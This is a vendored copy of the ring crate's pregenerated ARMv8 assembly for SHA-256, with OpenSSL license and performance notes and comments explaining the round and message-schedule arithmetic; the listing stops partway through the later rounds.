repo_id | size | file_path | content |
|---|---|---|---|
mi2bjss/Pressel-site | 34,239 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/sha256-armv8-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
// Copyright 2014-2020 The OpenSSL Project Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ====================================================================
// Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
// project.
// ====================================================================
//
// SHA256/512 for ARMv8.
//
// Performance in cycles per processed byte and improvement coefficient
// over code generated with "default" compiler:
//
//              SHA256-hw    SHA256(*)      SHA512
// Apple A7     1.97         10.5 (+33%)    6.73 (-1%(**))
// Cortex-A53   2.38         15.5 (+115%)   10.0 (+150%(***))
// Cortex-A57   2.31         11.6 (+86%)    7.51 (+260%(***))
// Denver       2.01         10.5 (+26%)    6.70 (+8%)
// X-Gene       -            20.0 (+100%)   12.8 (+300%(***))
// Mongoose     2.36         13.0 (+50%)    8.36 (+33%)
// Kryo         1.92         17.4 (+30%)    11.2 (+8%)
//
// (*) Software SHA256 results are of lesser relevance, presented
// mostly for informational purposes.
// (**) The result is a trade-off: it's possible to improve it by
// 10% (or by 1 cycle per round), but at the cost of 20% loss
// on Cortex-A53 (or by 4 cycles per round).
// (***) Super-impressive coefficients over gcc-generated code are an
// indication of some compiler "pathology"; most notably, code
// generated with -mgeneral-regs-only is significantly faster, in
// which case the gap is only 40-90%.
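//
// This file provides two entry points: sha256_block_data_order_nohw,
// the scalar fallback below, and sha256_block_data_order_hw, which
// uses the Armv8 SHA-256 extension instructions. Choosing between
// them according to CPU capabilities is left to the caller.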
#ifndef __KERNEL__
#endif
.text
.globl sha256_block_data_order_nohw
.hidden sha256_block_data_order_nohw
.type sha256_block_data_order_nohw,%function
.align 6
sha256_block_data_order_nohw:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub sp,sp,#4*4
ldp w20,w21,[x0] // load context
ldp w22,w23,[x0,#2*4]
ldp w24,w25,[x0,#4*4]
add x2,x1,x2,lsl#6 // end of input
ldp w26,w27,[x0,#6*4]
adrp x30,.LK256
add x30,x30,:lo12:.LK256
stp x0,x2,[x29,#96]
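// Register allocation in the scalar rounds below: w20-w27 hold the
// working variables a..h (renamed cyclically each round), x30 walks
// the .LK256 constant table, w19/w28 alternate between K[i] and the
// Maj() accumulator, and the 16 message schedule words X[0..15] live
// in w3-w15 and (once the pointers are saved to the frame) w0-w2.
// Each round computes, per FIPS 180-4:
//   T1 = h + Sigma1(e) + Ch(e,f,g) + K[i] + X[i];  d += T1
//   h  = T1 + Sigma0(a) + Maj(a,b,c)
// where Ch(e,f,g) = (e&f)|(~e&g) (the and/bic/orr triple) and
// Maj(a,b,c) = ((b^c)&(a^b))^b. Sigma1(e) = ror(e,6)^ror(e,11)^ror(e,25)
// is computed as ror(e,6) ^ ror(e^ror(e,14),11) to save a rotate, and
// Sigma0(a) = ror(a,2)^ror(a,13)^ror(a,22) is factored the same way.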
.Loop:
ldp w3,w4,[x1],#2*4
ldr w19,[x30],#4 // *K++
eor w28,w21,w22 // magic seed
str x1,[x29,#112]
#ifndef __AARCH64EB__
rev w3,w3 // 0
#endif
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
eor w6,w24,w24,ror#14
and w17,w25,w24
bic w19,w26,w24
add w27,w27,w3 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w6,ror#11 // Sigma1(e)
ror w6,w20,#2
add w27,w27,w17 // h+=Ch(e,f,g)
eor w17,w20,w20,ror#9
add w27,w27,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w23,w23,w27 // d+=h
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w6,w17,ror#13 // Sigma0(a)
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w27,w27,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w4,w4 // 1
#endif
ldp w5,w6,[x1],#2*4
add w27,w27,w17 // h+=Sigma0(a)
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
eor w7,w23,w23,ror#14
and w17,w24,w23
bic w28,w25,w23
add w26,w26,w4 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w7,ror#11 // Sigma1(e)
ror w7,w27,#2
add w26,w26,w17 // h+=Ch(e,f,g)
eor w17,w27,w27,ror#9
add w26,w26,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w22,w22,w26 // d+=h
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w7,w17,ror#13 // Sigma0(a)
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w26,w26,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w5,w5 // 2
#endif
add w26,w26,w17 // h+=Sigma0(a)
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
eor w8,w22,w22,ror#14
and w17,w23,w22
bic w19,w24,w22
add w25,w25,w5 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w8,ror#11 // Sigma1(e)
ror w8,w26,#2
add w25,w25,w17 // h+=Ch(e,f,g)
eor w17,w26,w26,ror#9
add w25,w25,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w21,w21,w25 // d+=h
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w8,w17,ror#13 // Sigma0(a)
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w25,w25,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w6,w6 // 3
#endif
ldp w7,w8,[x1],#2*4
add w25,w25,w17 // h+=Sigma0(a)
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
eor w9,w21,w21,ror#14
and w17,w22,w21
bic w28,w23,w21
add w24,w24,w6 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w9,ror#11 // Sigma1(e)
ror w9,w25,#2
add w24,w24,w17 // h+=Ch(e,f,g)
eor w17,w25,w25,ror#9
add w24,w24,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w20,w20,w24 // d+=h
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w9,w17,ror#13 // Sigma0(a)
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w24,w24,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w7,w7 // 4
#endif
add w24,w24,w17 // h+=Sigma0(a)
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
eor w10,w20,w20,ror#14
and w17,w21,w20
bic w19,w22,w20
add w23,w23,w7 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w10,ror#11 // Sigma1(e)
ror w10,w24,#2
add w23,w23,w17 // h+=Ch(e,f,g)
eor w17,w24,w24,ror#9
add w23,w23,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w27,w27,w23 // d+=h
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w10,w17,ror#13 // Sigma0(a)
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w23,w23,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w8,w8 // 5
#endif
ldp w9,w10,[x1],#2*4
add w23,w23,w17 // h+=Sigma0(a)
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
eor w11,w27,w27,ror#14
and w17,w20,w27
bic w28,w21,w27
add w22,w22,w8 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w11,ror#11 // Sigma1(e)
ror w11,w23,#2
add w22,w22,w17 // h+=Ch(e,f,g)
eor w17,w23,w23,ror#9
add w22,w22,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w26,w26,w22 // d+=h
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w11,w17,ror#13 // Sigma0(a)
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w22,w22,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w9,w9 // 6
#endif
add w22,w22,w17 // h+=Sigma0(a)
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
eor w12,w26,w26,ror#14
and w17,w27,w26
bic w19,w20,w26
add w21,w21,w9 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w12,ror#11 // Sigma1(e)
ror w12,w22,#2
add w21,w21,w17 // h+=Ch(e,f,g)
eor w17,w22,w22,ror#9
add w21,w21,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w25,w25,w21 // d+=h
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w12,w17,ror#13 // Sigma0(a)
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w21,w21,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w10,w10 // 7
#endif
ldp w11,w12,[x1],#2*4
add w21,w21,w17 // h+=Sigma0(a)
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
eor w13,w25,w25,ror#14
and w17,w26,w25
bic w28,w27,w25
add w20,w20,w10 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w13,ror#11 // Sigma1(e)
ror w13,w21,#2
add w20,w20,w17 // h+=Ch(e,f,g)
eor w17,w21,w21,ror#9
add w20,w20,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w24,w24,w20 // d+=h
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w13,w17,ror#13 // Sigma0(a)
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w20,w20,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w11,w11 // 8
#endif
add w20,w20,w17 // h+=Sigma0(a)
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
eor w14,w24,w24,ror#14
and w17,w25,w24
bic w19,w26,w24
add w27,w27,w11 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w14,ror#11 // Sigma1(e)
ror w14,w20,#2
add w27,w27,w17 // h+=Ch(e,f,g)
eor w17,w20,w20,ror#9
add w27,w27,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w23,w23,w27 // d+=h
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w14,w17,ror#13 // Sigma0(a)
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w27,w27,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w12,w12 // 9
#endif
ldp w13,w14,[x1],#2*4
add w27,w27,w17 // h+=Sigma0(a)
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
eor w15,w23,w23,ror#14
and w17,w24,w23
bic w28,w25,w23
add w26,w26,w12 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w15,ror#11 // Sigma1(e)
ror w15,w27,#2
add w26,w26,w17 // h+=Ch(e,f,g)
eor w17,w27,w27,ror#9
add w26,w26,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w22,w22,w26 // d+=h
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w15,w17,ror#13 // Sigma0(a)
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w26,w26,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w13,w13 // 10
#endif
add w26,w26,w17 // h+=Sigma0(a)
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
eor w0,w22,w22,ror#14
and w17,w23,w22
bic w19,w24,w22
add w25,w25,w13 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w0,ror#11 // Sigma1(e)
ror w0,w26,#2
add w25,w25,w17 // h+=Ch(e,f,g)
eor w17,w26,w26,ror#9
add w25,w25,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w21,w21,w25 // d+=h
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w0,w17,ror#13 // Sigma0(a)
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w25,w25,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w14,w14 // 11
#endif
ldp w15,w0,[x1],#2*4
add w25,w25,w17 // h+=Sigma0(a)
str w6,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
eor w6,w21,w21,ror#14
and w17,w22,w21
bic w28,w23,w21
add w24,w24,w14 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w6,ror#11 // Sigma1(e)
ror w6,w25,#2
add w24,w24,w17 // h+=Ch(e,f,g)
eor w17,w25,w25,ror#9
add w24,w24,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w20,w20,w24 // d+=h
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w6,w17,ror#13 // Sigma0(a)
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w24,w24,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w15,w15 // 12
#endif
add w24,w24,w17 // h+=Sigma0(a)
str w7,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
eor w7,w20,w20,ror#14
and w17,w21,w20
bic w19,w22,w20
add w23,w23,w15 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w7,ror#11 // Sigma1(e)
ror w7,w24,#2
add w23,w23,w17 // h+=Ch(e,f,g)
eor w17,w24,w24,ror#9
add w23,w23,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w27,w27,w23 // d+=h
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w7,w17,ror#13 // Sigma0(a)
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w23,w23,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w0,w0 // 13
#endif
ldp w1,w2,[x1]
add w23,w23,w17 // h+=Sigma0(a)
str w8,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
eor w8,w27,w27,ror#14
and w17,w20,w27
bic w28,w21,w27
add w22,w22,w0 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w8,ror#11 // Sigma1(e)
ror w8,w23,#2
add w22,w22,w17 // h+=Ch(e,f,g)
eor w17,w23,w23,ror#9
add w22,w22,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w26,w26,w22 // d+=h
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w8,w17,ror#13 // Sigma0(a)
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w22,w22,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w1,w1 // 14
#endif
ldr w6,[sp,#12]
add w22,w22,w17 // h+=Sigma0(a)
str w9,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
eor w9,w26,w26,ror#14
and w17,w27,w26
bic w19,w20,w26
add w21,w21,w1 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w9,ror#11 // Sigma1(e)
ror w9,w22,#2
add w21,w21,w17 // h+=Ch(e,f,g)
eor w17,w22,w22,ror#9
add w21,w21,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w25,w25,w21 // d+=h
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w9,w17,ror#13 // Sigma0(a)
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w21,w21,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w2,w2 // 15
#endif
ldr w7,[sp,#0]
add w21,w21,w17 // h+=Sigma0(a)
str w10,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w9,w4,#7
and w17,w26,w25
ror w8,w1,#17
bic w28,w27,w25
ror w10,w21,#2
add w20,w20,w2 // h+=X[i]
eor w16,w16,w25,ror#11
eor w9,w9,w4,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w10,w10,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w8,w8,w1,ror#19
eor w9,w9,w4,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w10,w21,ror#22 // Sigma0(a)
eor w8,w8,w1,lsr#10 // sigma1(X[i+14])
add w3,w3,w12
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w3,w3,w9
add w20,w20,w17 // h+=Sigma0(a)
add w3,w3,w8
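// Rounds 16..63 reuse the same round function, but each X[i] is now
// produced on the fly by the schedule recurrence (FIPS 180-4):
//   X[i] = X[i-16] + sigma0(X[i-15]) + X[i-7] + sigma1(X[i-2])
// with sigma0(x) = ror(x,7)^ror(x,18)^(x>>3) and
//      sigma1(x) = ror(x,17)^ror(x,19)^(x>>10).
// The loop exits when the "ldr w19/w28,[x30],#4" fetch returns the
// zero terminator stored after .LK256; the "rewind" below then steps
// x30 back over the 64 constants plus the terminator (260 bytes).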
.Loop_16_xx:
ldr w8,[sp,#4]
str w11,[sp,#0]
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
ror w10,w5,#7
and w17,w25,w24
ror w9,w2,#17
bic w19,w26,w24
ror w11,w20,#2
add w27,w27,w3 // h+=X[i]
eor w16,w16,w24,ror#11
eor w10,w10,w5,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w24,ror#25 // Sigma1(e)
eor w11,w11,w20,ror#13
add w27,w27,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w9,w9,w2,ror#19
eor w10,w10,w5,lsr#3 // sigma0(X[i+1])
add w27,w27,w16 // h+=Sigma1(e)
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w11,w20,ror#22 // Sigma0(a)
eor w9,w9,w2,lsr#10 // sigma1(X[i+14])
add w4,w4,w13
add w23,w23,w27 // d+=h
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w4,w4,w10
add w27,w27,w17 // h+=Sigma0(a)
add w4,w4,w9
ldr w9,[sp,#8]
str w12,[sp,#4]
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
ror w11,w6,#7
and w17,w24,w23
ror w10,w3,#17
bic w28,w25,w23
ror w12,w27,#2
add w26,w26,w4 // h+=X[i]
eor w16,w16,w23,ror#11
eor w11,w11,w6,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w23,ror#25 // Sigma1(e)
eor w12,w12,w27,ror#13
add w26,w26,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w10,w10,w3,ror#19
eor w11,w11,w6,lsr#3 // sigma0(X[i+1])
add w26,w26,w16 // h+=Sigma1(e)
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w12,w27,ror#22 // Sigma0(a)
eor w10,w10,w3,lsr#10 // sigma1(X[i+14])
add w5,w5,w14
add w22,w22,w26 // d+=h
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w5,w5,w11
add w26,w26,w17 // h+=Sigma0(a)
add w5,w5,w10
ldr w10,[sp,#12]
str w13,[sp,#8]
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
ror w12,w7,#7
and w17,w23,w22
ror w11,w4,#17
bic w19,w24,w22
ror w13,w26,#2
add w25,w25,w5 // h+=X[i]
eor w16,w16,w22,ror#11
eor w12,w12,w7,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w22,ror#25 // Sigma1(e)
eor w13,w13,w26,ror#13
add w25,w25,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w11,w11,w4,ror#19
eor w12,w12,w7,lsr#3 // sigma0(X[i+1])
add w25,w25,w16 // h+=Sigma1(e)
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w13,w26,ror#22 // Sigma0(a)
eor w11,w11,w4,lsr#10 // sigma1(X[i+14])
add w6,w6,w15
add w21,w21,w25 // d+=h
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w6,w6,w12
add w25,w25,w17 // h+=Sigma0(a)
add w6,w6,w11
ldr w11,[sp,#0]
str w14,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
ror w13,w8,#7
and w17,w22,w21
ror w12,w5,#17
bic w28,w23,w21
ror w14,w25,#2
add w24,w24,w6 // h+=X[i]
eor w16,w16,w21,ror#11
eor w13,w13,w8,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w21,ror#25 // Sigma1(e)
eor w14,w14,w25,ror#13
add w24,w24,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w12,w12,w5,ror#19
eor w13,w13,w8,lsr#3 // sigma0(X[i+1])
add w24,w24,w16 // h+=Sigma1(e)
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w14,w25,ror#22 // Sigma0(a)
eor w12,w12,w5,lsr#10 // sigma1(X[i+14])
add w7,w7,w0
add w20,w20,w24 // d+=h
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w7,w7,w13
add w24,w24,w17 // h+=Sigma0(a)
add w7,w7,w12
ldr w12,[sp,#4]
str w15,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
ror w14,w9,#7
and w17,w21,w20
ror w13,w6,#17
bic w19,w22,w20
ror w15,w24,#2
add w23,w23,w7 // h+=X[i]
eor w16,w16,w20,ror#11
eor w14,w14,w9,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w20,ror#25 // Sigma1(e)
eor w15,w15,w24,ror#13
add w23,w23,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w13,w13,w6,ror#19
eor w14,w14,w9,lsr#3 // sigma0(X[i+1])
add w23,w23,w16 // h+=Sigma1(e)
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w15,w24,ror#22 // Sigma0(a)
eor w13,w13,w6,lsr#10 // sigma1(X[i+14])
add w8,w8,w1
add w27,w27,w23 // d+=h
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w8,w8,w14
add w23,w23,w17 // h+=Sigma0(a)
add w8,w8,w13
ldr w13,[sp,#8]
str w0,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
ror w15,w10,#7
and w17,w20,w27
ror w14,w7,#17
bic w28,w21,w27
ror w0,w23,#2
add w22,w22,w8 // h+=X[i]
eor w16,w16,w27,ror#11
eor w15,w15,w10,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w27,ror#25 // Sigma1(e)
eor w0,w0,w23,ror#13
add w22,w22,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w14,w14,w7,ror#19
eor w15,w15,w10,lsr#3 // sigma0(X[i+1])
add w22,w22,w16 // h+=Sigma1(e)
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w0,w23,ror#22 // Sigma0(a)
eor w14,w14,w7,lsr#10 // sigma1(X[i+14])
add w9,w9,w2
add w26,w26,w22 // d+=h
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w9,w9,w15
add w22,w22,w17 // h+=Sigma0(a)
add w9,w9,w14
ldr w14,[sp,#12]
str w1,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
ror w0,w11,#7
and w17,w27,w26
ror w15,w8,#17
bic w19,w20,w26
ror w1,w22,#2
add w21,w21,w9 // h+=X[i]
eor w16,w16,w26,ror#11
eor w0,w0,w11,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w26,ror#25 // Sigma1(e)
eor w1,w1,w22,ror#13
add w21,w21,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w15,w15,w8,ror#19
eor w0,w0,w11,lsr#3 // sigma0(X[i+1])
add w21,w21,w16 // h+=Sigma1(e)
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w1,w22,ror#22 // Sigma0(a)
eor w15,w15,w8,lsr#10 // sigma1(X[i+14])
add w10,w10,w3
add w25,w25,w21 // d+=h
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w10,w10,w0
add w21,w21,w17 // h+=Sigma0(a)
add w10,w10,w15
ldr w15,[sp,#0]
str w2,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w1,w12,#7
and w17,w26,w25
ror w0,w9,#17
bic w28,w27,w25
ror w2,w21,#2
add w20,w20,w10 // h+=X[i]
eor w16,w16,w25,ror#11
eor w1,w1,w12,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w2,w2,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w0,w0,w9,ror#19
eor w1,w1,w12,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w2,w21,ror#22 // Sigma0(a)
eor w0,w0,w9,lsr#10 // sigma1(X[i+14])
add w11,w11,w4
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w11,w11,w1
add w20,w20,w17 // h+=Sigma0(a)
add w11,w11,w0
ldr w0,[sp,#4]
str w3,[sp,#0]
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
ror w2,w13,#7
and w17,w25,w24
ror w1,w10,#17
bic w19,w26,w24
ror w3,w20,#2
add w27,w27,w11 // h+=X[i]
eor w16,w16,w24,ror#11
eor w2,w2,w13,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w24,ror#25 // Sigma1(e)
eor w3,w3,w20,ror#13
add w27,w27,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w1,w1,w10,ror#19
eor w2,w2,w13,lsr#3 // sigma0(X[i+1])
add w27,w27,w16 // h+=Sigma1(e)
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w3,w20,ror#22 // Sigma0(a)
eor w1,w1,w10,lsr#10 // sigma1(X[i+14])
add w12,w12,w5
add w23,w23,w27 // d+=h
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w12,w12,w2
add w27,w27,w17 // h+=Sigma0(a)
add w12,w12,w1
ldr w1,[sp,#8]
str w4,[sp,#4]
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
ror w3,w14,#7
and w17,w24,w23
ror w2,w11,#17
bic w28,w25,w23
ror w4,w27,#2
add w26,w26,w12 // h+=X[i]
eor w16,w16,w23,ror#11
eor w3,w3,w14,ror#18
orr w17,w17,w28 // Ch(e,f,g)
